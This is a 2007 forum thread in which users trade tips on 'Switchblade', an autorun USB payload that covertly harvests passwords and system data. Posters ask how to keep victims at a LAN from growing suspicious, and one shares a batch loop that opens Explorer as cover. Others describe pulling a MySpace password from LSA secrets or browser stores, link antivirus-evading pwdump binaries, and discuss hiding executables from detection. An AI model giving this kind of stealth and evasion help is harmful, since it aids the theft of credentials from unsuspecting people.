Ahriman Posted May 10, 2007 Share Posted May 10, 2007 I have been running Siliv's version of Switchblade, and it is sweeeeet! Just one question, though (there's always one): After the drive has been inserted, and the user has clicked the "Open.." in autorun, switchblade does its thing. I can see a problem right away in that it doesn't open an explorer window, so were I to pass this to someone at, say a LAN, they woudl straight away know that something is screwy. I have tried adding this to just before the :END call: start explorer.exe .... but this seems to have no effect. Anyone else have any ideas how i could get it to open explorer when it's done it's thing, so that it doesn't arouse suspicion? Cheers Quote Link to comment Share on other sites More sharing options...
GonZor Posted May 10, 2007 Share Posted May 10, 2007 I have been running Siliv's version of Switchblade, and it is sweeeeet! Just one question, though (there's always one): After the drive has been inserted, and the user has clicked the "Open.." in autorun, switchblade does its thing. I can see a problem right away in that it doesn't open an explorer window, so were I to pass this to someone at, say a LAN, they woudl straight away know that something is screwy. I have tried adding this to just before the :END call: start explorer.exe .... but this seems to have no effect. Anyone else have any ideas how i could get it to open explorer when it's done it's thing, so that it doesn't arouse suspicion? Cheers Have you tried adding it to the begining of the file? From what I can tell this would be a much smarter approach because it will not delay (especially on slower machines) Quote Link to comment Share on other sites More sharing options...
Ahriman Posted May 10, 2007 Share Posted May 10, 2007 Have you tried adding it to the begining of the file? From what I can tell this would be a much smarter approach because it will not delay (especially on slower machines) Tried that just then, still nothing. Even changed the command to be start explorer or start explorer but while it works properly if I double-click the go.cmd file, running it via autoplay seems to ignore this. Even tried the suggestions put forward in this post, but nothing :S Quote Link to comment Share on other sites More sharing options...
Leapo Posted May 10, 2007 Share Posted May 10, 2007 This should open the root of the drive (you'll need to make sure you have nircmd.exe in your X:WIPCMD folder): @echo off start .... nircmd.exe win max ititle "Removeable" Quote Link to comment Share on other sites More sharing options...
Obi-Wahn Posted May 10, 2007 Share Posted May 10, 2007 Look at the code a 2nd time. You've forgot a single point. it has to be: start explorer ..... The single point says, that from this path to 2 instances up. alternative you can add this line (at the top or at the end) to define the drive. (info: it only works if the file autorun.inf (which is changeable) exists in the drive. for %%i in (D E F G H I J K L M N O P Q R S T U V W X Y Z) do if exist %%i:autorun.inf start %Windir%explorer.exe %%i: (untested with start, I set a var with this line) Quote Link to comment Share on other sites More sharing options...
Ahriman Posted May 10, 2007 Share Posted May 10, 2007 for %%i in (D E F G H I J K L M N O P Q R S T U V W X Y Z) do if exist %%i:autorun.inf start %Windir%explorer.exe %%i: Awesome, that worked a treat, thanks heaps. Quote Link to comment Share on other sites More sharing options...
Leapo Posted May 10, 2007 Share Posted May 10, 2007 Look at the code a 2nd time. You've forgot a single point. it has to be: start explorer ..... The single point says, that from this path to 2 instances up... Don't know what to tell you, my original code appears to work just fine on every system I've tried it on... Quote Link to comment Share on other sites More sharing options...
Ahriman Posted May 10, 2007 Share Posted May 10, 2007 It's possible that it's my system thats causing that method to not work, as I have only tried it on this one so far. Over the weekend, I'll be able to test it on some other machines, and see which method works on those. Quote Link to comment Share on other sites More sharing options...
Carlyl3 Posted May 11, 2007 Share Posted May 11, 2007 hey guys, where can I download the latest Switchblade package? the WIKI is still down, and none of the links to the download files in the forum work. help! what's the latest version of the payload? Quote Link to comment Share on other sites More sharing options...
Ahriman Posted May 11, 2007 Share Posted May 11, 2007 I got one from network0.org, found the link in one of the posts here. It was the first one I could find that was still available. Otherwise, I suppose googling "switchblade usb" or something might find a few more options. Quote Link to comment Share on other sites More sharing options...
marc Posted May 19, 2007 Share Posted May 19, 2007 -deleted post. I posted too soon for help with the U3 version payload, without giving it a good shot myself. Apologies. Quote Link to comment Share on other sites More sharing options...
GonZor Posted June 9, 2007 Share Posted June 9, 2007 Ive finally put my payload onto the wiki at the moment I have not included the Hacksaw but I will be doing this soon when I have time. the Development thread for my payload is here (yes setzer1411 did spell my name wrong) I have also made a small site for my payload this is where the most recent up to date information will always be, I will try to cover all questions in the forums on the FAQ here as well http://www.users.on.net/~simmo_89/switchblade/Index.html Quote Link to comment Share on other sites More sharing options...
setzer1411 Posted June 9, 2007 Share Posted June 9, 2007 Lol I see no misspelled words, but keep up the good work. Quote Link to comment Share on other sites More sharing options...
Evolution Posted June 10, 2007 Share Posted June 10, 2007 i've made my own payload {version?} of switchblade, is it worth putting it on the wiki? features include -ftp -rar file (encrypted) -choices on which files to run -easily customisable batch file -pre compiled stealth exe and somemore random stuff Download it here or go to the homepage Quote Link to comment Share on other sites More sharing options...
Hurtcake Posted June 26, 2007 Share Posted June 26, 2007 Hi, today something weird happend to my hacksaw.Ā All the files just disappeared.Ā All the files from the cmd folder, all the documents, even the script at he virtual cdrom.Ā Only the file "PKIIntro" remains on the cd.Ā Most of the files aren't detected by an antivirus, so it couldn't have deleted them.Ā All the files were even read only. How can this happend? Quote Link to comment Share on other sites More sharing options...
elmer Posted June 26, 2007 Share Posted June 26, 2007 Hi, today something weird happend to my hacksaw.Ā All the files just disappeared.Ā All the files from the cmd folder, all the documents, even the script at he virtual cdrom.Ā Only the file "PKIIntro" remains on the cd.Ā Most of the files aren't detected by an antivirus, so it couldn't have deleted them.Ā All the files were even read only. How can this happend? You might have "Hide protected operating system files" turned on. Click "Tools" in Explorer, then go to "Folder Options," then "View," and finally uncheck "Hide protected operating system files." Here's a screen capture for you: Quote Link to comment Share on other sites More sharing options...
Hurtcake Posted June 27, 2007 Share Posted June 27, 2007 Thanks for the reply. I really dont know what i did, but all the files came back today.. :shock: Quote Link to comment Share on other sites More sharing options...
comfortablynumb1163 Posted July 18, 2007 Share Posted July 18, 2007 I only read the first 20 or so pages of the thread but this wasn't covered. . . Using the MaxDamage iso on my u3 drive is there a way that I can stop the explorer window from popping up when I connect the drive? Im not sure if this is supposed to happen or a problem that is unique to my setup. Quote Link to comment Share on other sites More sharing options...
Charlie123 Posted July 26, 2007 Share Posted July 26, 2007 The script forgetting all the account info forĀ email Addy and pass is great! IS there one in order to get the myspace password also?? Just curious. . . . . . . . . . Quote Link to comment Share on other sites More sharing options...
GonZor Posted July 27, 2007 Share Posted July 27, 2007 The script forgetting all the account info forĀ email Addy and pass is great! IS there one in order to get the myspace password also?? Just curious. . . . . . . . . . Depending on whether the user has saved the password this COULD be retrieved through either lsa secrets, IE password or Firefox password. As far as I know there is no special way that a myspace password is saved, maybe myspace IM saves it somewhere?? I don't know I've never used it. Quote Link to comment Share on other sites More sharing options...
USBHacker Posted October 23, 2007 Share Posted October 23, 2007 i've made my own payload {version?} of switchblade, is it worth putting it on the wiki? features include -ftp -rar file (encrypted) -choices on which files to run -easily customisable batch file -pre compiled stealth exe and somemore random stuff Download it here or go to the homepage Nope. Stealth exe? Can I have the source code for that please? Quote Link to comment Share on other sites More sharing options...
beakmyn Posted November 18, 2007 Share Posted November 18, 2007 So, I'm in process of re-writing the switchblade 'code' into vbs. It's based on GonZor's method so it uses the ###.dat files This is so that I can output the data into HTML format (very similar to WinAudit html) Now here comes one question/decision. Since vbs is more powerful then a simple batch file I can either A. wshell.exec ("net user") which will be very fast and give me a list of users B. Use WMI or another technique and get vastly more data AccountType Caption Description Disabled Domain FullName LocalAccount Lockout Name PasswordChangeable PasswordExpires PasswordRequired SID SIDType Status After doing some testing it appears that as expected wshell.exec is almost instantaneous whereas WMI or another method takes 20 seconds. Which would you prefer? I suppose I could just code both and then the user could just put a 1 or 2 in the dat file and I'll run the appropriate one. Quote Link to comment Share on other sites More sharing options...
trustme Posted November 18, 2007 Share Posted November 18, 2007 Just so you know, in the future the payload will be based on a .ini, instead of dat files.Ā It would probably be best to code both to let the user pick, we can create a spot in the gui for the user to pick which method (similar to FGDump/PWDump). Quote Link to comment Share on other sites More sharing options...
HarshReality Posted December 5, 2007 Share Posted December 5, 2007 i've made my own payload {version?} of switchblade, is it worth putting it on the wiki? features include -ftp -rar file (encrypted) -choices on which files to run -easily customisable batch file -pre compiled stealth exe and somemore random stuff Download it here or go to the homepage Nope. Stealth exe? Can I have the source code for that please? Incidentally firepassword shows as a virus with NAV Quote Link to comment Share on other sites More sharing options...
sc0rpi0 Posted December 12, 2007 Share Posted December 12, 2007 Ok, so id like to know what executables are detectable as viruses. pwdump is... I plan to fix that right now. PM me on irc if you have a better idea. nick == Brainkill ===================== pwdump and its dependencies can be encrypted. Ill post links below to the programs. Standard Disclaimers Apply! http://www.brainkill.net/hack/pwdump.exe http://www.brainkill.net/hack/pwservice.exe http://www.brainkill.net/hack/LsaExt.dll ======================= How in the world did you encrypt them? I know how to make executables undetectable...that is...until I run themĀ Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.